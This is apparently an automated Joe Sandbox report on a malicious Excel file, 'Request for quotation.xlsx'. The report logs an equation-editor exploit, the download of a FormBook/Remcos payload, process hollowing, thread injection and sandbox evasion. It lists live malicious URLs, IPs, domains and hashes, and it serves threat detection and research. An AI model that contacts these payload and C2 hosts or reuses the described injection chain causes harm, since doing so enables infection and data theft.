          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A570202 FindFirstFileW,GetFullPathNameW,RemoveDirectoryW,RemoveDirectoryW,GetLastError,GetLastError,GetFileAttributesW,SetFileAttributesW,RemoveDirectoryW,GetLastError,9_2_4A570202
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A56BF0C FindFirstFileW,FindNextFileW,FindClose,9_2_4A56BF0C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55BBA4 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,FindNextFileW,GetLastError,FindClose,9_2_4A55BBA4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A570492 FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetLastError,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,FindNextFileW,FindClose,9_2_4A570492
          Source: explorer.exe, 00000008.00000000.2251278805.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.2257941915.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: vbc.exe, 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000008.00000000.2257823360.00000000041AD000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: explorer.exe, 00000008.00000000.2251408426.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00409A90 rdtsc 7_2_00409A90
          Source: C:\Users\Public\vbc.exeCode function: 7_2_0040ACD0 LdrLoadDll,7_2_0040ACD0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A56D539 LoadLibraryW,GetProcAddress,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,9_2_4A56D539
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A20080 mov ecx, dword ptr fs:[00000030h]7_2_00A20080
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A200EA mov eax, dword ptr fs:[00000030h]7_2_00A200EA
          Source: C:\Users\Public\vbc.exeCode function: 7_2_00A426F8 mov eax, dword ptr fs:[00000030h]7_2_00A426F8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_02280080 mov ecx, dword ptr fs:[00000030h]9_2_02280080
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022800EA mov eax, dword ptr fs:[00000030h]9_2_022800EA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_022A26F8 mov eax, dword ptr fs:[00000030h]9_2_022A26F8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A552E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,9_2_4A552E73
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A5513A9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_4A5513A9
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A557C63 SetUnhandledExceptionFilter,9_2_4A557C63
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.181.41 80Jump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 1388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 4A550000Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
          Source: explorer.exe, 00000008.00000002.2391506511.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000002.2391506511.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.2251278805.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000008.00000002.2391506511.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Windows\SysWOW64\cmd.exeCode function: _wcsicmp,GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,memmove,GetLocaleInfoW,GetTimeFormatW,9_2_4A55D701
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetDateFormatW,realloc,GetDateFormatW,_wcsicmp,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,memmove,GetSystemTime,SystemTimeToFileTime,memmove,GetLastError,realloc,9_2_4A56270D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,9_2_4A5588D9
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A564E44 GetSystemTime,SystemTimeToFileTime,9_2_4A564E44
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0038BA60 GetUserNameA,4_2_0038BA60
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55D3B3 GetVersion,9_2_4A55D3B3
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Disable or Modify Tools1Credential API Hooking1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information31Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSSystem Information Discovery126Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRootkit1LSA SecretsSecurity Software Discovery331SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading111Cached Domain CredentialsVirtualization/Sandbox Evasion3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion3DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection612Proc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 321122 Sample: Request for quotation.xlsx Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 54 Multi AV Scanner detection for domain / URL 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Antivirus detection for URL or domain 2->58 60 16 other signatures 2->60 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 37 14 2->15         started        process3 dnsIp4 42 thdyneverwalkachinese2loneinlifekthfnp.ydns.eu 103.141.138.87, 49167, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->42 36 C:\Users\user\AppData\Local\...\winlog[1].exe, PE32 10->36 dropped 38 C:\Users\Public\vbc.exe, PE32 10->38 dropped 70 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->70 17 vbc.exe 1 5 10->17         started        40 C:\Users\...\~$Request for quotation.xlsx, data 15->40 dropped file5 signatures6 process7 signatures8 46 Antivirus detection for dropped file 17->46 48 Multi AV Scanner detection for dropped file 17->48 50 Machine Learning detection for dropped file 17->50 52 2 other signatures 17->52 20 vbc.exe 17->20         started        23 vbc.exe 17->23         started        25 vbc.exe 17->25         started        process9 signatures10 62 Modifies the context of a thread in another process (thread injection) 20->62 64 Maps a DLL or memory area into another process 20->64 66 Sample uses process hollowing technique 20->66 68 Queues an APC in another process (thread injection) 20->68 27 explorer.exe 20->27 injected process11 dnsIp12 44 www.segredosdocopywriting.com 172.67.181.41, 49168, 80 CLOUDFLARENETUS United States 27->44 72 System process connects to network (likely due to code injection or exploit) 27->72 31 cmd.exe 27->31         started        signatures13 process14 signatures15 74 Modifies the context of a thread in another process (thread injection) 31->74 76 Maps a DLL or memory area into another process 31->76 78 Tries to detect virtualization through RDTSC time measurements 31->78 34 cmd.exe 31->34         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Request for quotation.xlsx33%VirustotalBrowse
          Request for quotation.xlsx23%ReversingLabsWin32.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%AviraTR/AD.Swotter.yiimo
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe100%AviraTR/AD.Swotter.yiimo
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe33%ReversingLabsByteCode-MSIL.Backdoor.Remcos
          C:\Users\Public\vbc.exe33%ReversingLabsByteCode-MSIL.Backdoor.Remcos

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          7.2.vbc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          thdyneverwalkachinese2loneinlifekthfnp.ydns.eu7%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://thdyneverwalkachinese2loneinlifekthfnp.ydns.eu/chnsfrnd2/winlog.exe2%VirustotalBrowse
          http://thdyneverwalkachinese2loneinlifekthfnp.ydns.eu/chnsfrnd2/winlog.exe100%Avira URL Cloudmalware
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.segredosdocopywriting.com/ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ980%Avira URL Cloudsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.%s.com0%URL Reputationsafe
          http://www.%s.com0%URL Reputationsafe
          http://www.%s.com0%URL Reputationsafe
          http://www.%s.com0%URL Reputationsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.segredosdocopywriting.com
          		172.67.181.41
          		truetrue
            		unknown
            thdyneverwalkachinese2loneinlifekthfnp.ydns.eu
            		103.141.138.87
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://thdyneverwalkachinese2loneinlifekthfnp.ydns.eu/chnsfrnd2/winlog.exetrue
            • 2%, Virustotal, Browse
            • Avira URL Cloud: malware
            		unknown
            http://www.segredosdocopywriting.com/ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98true
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.windows.com/pctv.explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpfalse
              		high
              http://investor.msn.comexplorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpfalse
                		high
                http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.2260895982.0000000007FF0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2252341374.0000000001C70000.00000002.00000001.sdmpfalse
                    		high
                    http://wellformedweb.org/CommentAPI/explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.2265797693.000000000861C000.00000004.00000001.sdmpfalse
                      		high
                      http://investor.msn.com/explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpfalse
                        		high
                        http://www.iis.fhg.de/audioPAexplorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.%s.comexplorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		low
                        http://www.piriform.com/ccleanerexplorer.exe, 00000008.00000000.2265797693.000000000861C000.00000004.00000001.sdmpfalse
                          		high
                          http://computername/printers/printername/.printerexplorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://www.%s.comPAvbc.exe, 00000004.00000002.2260895982.0000000007FF0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2252341374.0000000001C70000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		low
                          http://%s.comexplorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		low
                          http://www.hotmail.com/oeexplorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpfalse
                            		high
                            http://treyresearch.netexplorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmpfalse
                              		high
                              http://servername/isapibackend.dllexplorer.exe, 00000008.00000000.2258936880.0000000004F30000.00000002.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		low

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              103.141.138.87
                              		unknownViet Nam
                              		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
                              172.67.181.41
                              		unknownUnited States
                              		13335CLOUDFLARENETUStrue

                              General Information

                              Joe Sandbox Version:31.0.0 Red Diamond
                              Analysis ID:321122
                              Start date:20.11.2020
                              Start time:11:26:18
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 11m 16s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:Request for quotation.xlsx
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:11
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:1
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winXLSX@13/3@2/2
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 16.4% (good quality ratio 15.6%)
                              • Quality average: 70.9%
                              • Quality standard deviation: 29.4%
                              HCA Information:
                              • Successful, ratio: 98%
                              • Number of executed functions: 75
                              • Number of non-executed functions: 199
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .xlsx
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtCreateFile calls found.
                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              11:27:18API Interceptor112x Sleep call for process: EQNEDT32.EXE modified
                              11:27:22API Interceptor285x Sleep call for process: vbc.exe modified
                              11:28:11API Interceptor200x Sleep call for process: cmd.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              103.141.138.878YPssSkVtu.rtfGet hashmaliciousBrowse
                              • mndyneverwalkachinese2loneinlifemnkngr.ydns.eu/chnsfrnd2/winlog.exe

                              Domains

                              No context

                              ASN

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNTyre Pricelist.xlsxGet hashmaliciousBrowse
                              • 103.125.191.5
                              2eD17GZuWs.exeGet hashmaliciousBrowse
                              • 103.125.191.5
                              Unique food order.xlsxGet hashmaliciousBrowse
                              • 103.125.191.5
                              tt payment proof.xlsxGet hashmaliciousBrowse
                              • 103.125.191.187
                              TIE-3735-2020.xlsxGet hashmaliciousBrowse
                              • 103.125.191.229
                              payslip.s.xlsxGet hashmaliciousBrowse
                              • 103.125.191.187
                              Telex-relase.xlsxGet hashmaliciousBrowse
                              • 103.141.138.120
                              Y0L60XAhvo.rtfGet hashmaliciousBrowse
                              • 103.141.138.122
                              d6pj421rXA.exeGet hashmaliciousBrowse
                              • 103.139.45.59
                              8YPssSkVtu.rtfGet hashmaliciousBrowse
                              • 103.141.138.87
                              PI098763556299.xlsxGet hashmaliciousBrowse
                              • 103.125.191.229
                              PIT12425009.xlsxGet hashmaliciousBrowse
                              • 103.125.191.229
                              wIeFid8p7Q.exeGet hashmaliciousBrowse
                              • 103.125.189.164
                              Dell ordine-09362-9-11-2020.exeGet hashmaliciousBrowse
                              • 103.139.45.59
                              shipping documents.xlsxGet hashmaliciousBrowse
                              • 103.133.108.6
                              shipping documents.xlsxGet hashmaliciousBrowse
                              • 103.133.108.6
                              EES RFQ 60-19__pdf.exeGet hashmaliciousBrowse
                              • 103.114.107.156
                              Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                              • 103.141.138.122
                              Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                              • 103.141.138.122
                              Z08LsyTAN6.exeGet hashmaliciousBrowse
                              • 103.125.189.164
                              CLOUDFLARENETUSMV TBN.exeGet hashmaliciousBrowse
                              • 104.28.5.151
                              PO 20-11-2020.ppsGet hashmaliciousBrowse
                              • 172.67.22.135
                              Quotation ATB-PR28500KINH.exeGet hashmaliciousBrowse
                              • 1.1.1.1
                              23prRlqeGr.exeGet hashmaliciousBrowse
                              • 104.23.98.190
                              RFQ-HSO-76411758-1.jarGet hashmaliciousBrowse
                              • 104.20.23.46
                              RFQ-HSO-76411758-1.jarGet hashmaliciousBrowse
                              • 104.20.22.46
                              iG9YiwEMru.exeGet hashmaliciousBrowse
                              • 104.27.132.115
                              Avion Quotation Request.docGet hashmaliciousBrowse
                              • 104.22.54.159
                              SUSPENSION LETTER ON SIM SWAP.pdf.exeGet hashmaliciousBrowse
                              • 172.67.131.55
                              Quotation ATB-PR28500KINH.exeGet hashmaliciousBrowse
                              • 1.1.1.1
                              SaXJC2CZ8m.exeGet hashmaliciousBrowse
                              • 104.27.133.115
                              PO91666. pdf.exeGet hashmaliciousBrowse
                              • 172.67.143.180
                              BT2wDapfoI.exeGet hashmaliciousBrowse
                              • 104.23.98.190
                              ara.exeGet hashmaliciousBrowse
                              • 172.65.200.133
                              ORDER FORM DENK.exeGet hashmaliciousBrowse
                              • 104.18.47.150
                              araiki.exeGet hashmaliciousBrowse
                              • 172.65.200.133
                              arailk.exeGet hashmaliciousBrowse
                              • 172.65.200.133
                              https://filmconsultancy.bindwall.ml/mike@filmconsultancy.comGet hashmaliciousBrowse
                              • 104.26.4.196
                              https://trondiamond.co/OMMOM/OM9u8Get hashmaliciousBrowse
                              • 104.16.18.94
                              https://t.e.vailresorts.com/r/?id=h1bac782d,59eb410,55e61f1&VRI_v73=96008558&cmpid=EML_OPENDAYS_RESO_000_OK_SR_REN1Y_000000_TG0001_20201118_V00_EX001_LOCA_ANN_00000_000Get hashmaliciousBrowse
                              • 104.16.149.64

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:downloaded
                              Size (bytes):962560
                              Entropy (8bit):4.317508777163088
                              Encrypted:false
                              SSDEEP:12288:wG0EuC4WRkmWF4fX8Lp1H24SYYSY+hbsBIZG1Xc:e04W62RSPsyZF
                              MD5:221E46C09EB3440BEB5A2256211C3262
                              SHA1:0F056342E6DFFB5C4F3CDD1D7BD4AC5427175BE0
                              SHA-256:6CA1B2240B6D547ADA7051DC4D0C198517436943FFD7A4D1EEBC0BCA19AC038A
